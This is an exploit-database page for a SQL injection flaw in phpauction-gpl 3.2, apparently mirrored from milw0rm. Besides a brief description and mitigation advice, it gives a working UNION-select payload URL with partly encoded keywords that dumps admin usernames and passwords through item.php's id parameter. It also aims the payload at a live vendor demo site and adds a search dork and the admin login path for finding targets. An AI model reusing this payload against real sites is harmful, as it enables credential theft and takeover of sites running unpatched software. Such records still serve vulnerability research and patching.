header-logo
Suggest Exploit
vendor:
phpauction-gpl
by:
Hussin X
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: phpauction-gpl
Affected Version From: 3.2
Affected Version To: 3.2
Patch Exists: NO
Related CWE: N/A
CPE: a:phpauction.net:phpauction-gpl:3.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2007

phpauction-gpl Version3.2 Version SQL Injection Vulnerability

A SQL injection vulnerability exists in phpauction-gpl Version3.2 Version, which allows an attacker to execute arbitrary SQL commands via the 'id' parameter in the 'item.php' script. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitize all user-supplied input to prevent malicious SQL code from being passed to the back-end database.
Source

Exploit-DB raw data:

#########################################################
#
#    phpauction-gpl Version3.2 Version  SQL Injection Vulnerability
#========================================================
#    Author: Hussin X                                   =
#                                                       =
#    Home :  www.tryag.cc/cc                            =
#                                                       =
#    email:  darkangel_g85[at]Yahoo[DoT]com             =
#            hussin.x[at]hotmail[DoT]com                =
#                                                       =
#========================================================
#    HomE script : http://www.phpauction.net
#     
#    Demo : http://www.phpauction.net/phpauction-gpl-3.2/   
#    
#
#    DorK :  Copyright 2007, PHPAUCTION.NET
#
#      
##########################################################

Exploit:   


http://www.site.net/[Pats]/item.php?id=-1+%75%6E%69%6F%6E+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+%66%72%6F%6D+PHPAUCTIONXL_adminusers--



L!VE DEMO:

http://www.phpauction.net/phpauction-gpl-3.2/item.php?id=-1+%75%6E%69%6F%6E+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+%66%72%6F%6D+PHPAUCTIONXL_adminusers--


LogiN:

admin/index.php


################################################################################
####################################( Greetz )##################################
#                                                                              #
#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      
#                Silic0n  / Rafi / FAHD / Iraqihack                            #       
#                                                                              #
#################################(and All IRAQIs)###############################
################################################################################

# milw0rm.com [2008-06-21]